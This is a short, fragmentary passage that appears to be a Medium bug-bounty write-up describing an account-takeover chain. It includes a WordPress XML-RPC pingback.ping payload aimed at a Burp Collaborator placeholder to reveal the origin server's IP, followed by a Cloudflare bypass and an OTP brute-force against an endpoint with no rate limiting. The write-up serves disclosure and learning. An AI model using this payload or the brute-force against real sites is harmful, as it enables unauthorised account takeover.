Tale of 3 vulnerabilities to account takeover!

https://github.com/projectdiscovery/subfinder
pingback.ping method allowed
<?xml version=”1.0″ encoding=”UTF-8″?>
<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param>
<value><string>[Burp collaborator link]</string></value>
</param>
<param>
<value><string>[Any valid blog post linl]</string></value>
</param>
</params>
</methodCall>
  1. Used the server’s IP to bypass Cloudflare by directly reaching to the origin server and
  2. Brute forced the OTP to tookover victim’s account (as “rate limiting” wasn’t set at the server side)

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Avinash Jain (@logicbomb)

Avinash Jain (@logicbomb)

Security Engineer @Microsoft | DevSecOps | Speaker | Breaking stuff to learn | Featured in Forbes, BBC| Acknowledged by Google, NASA, Yahoo, UN etc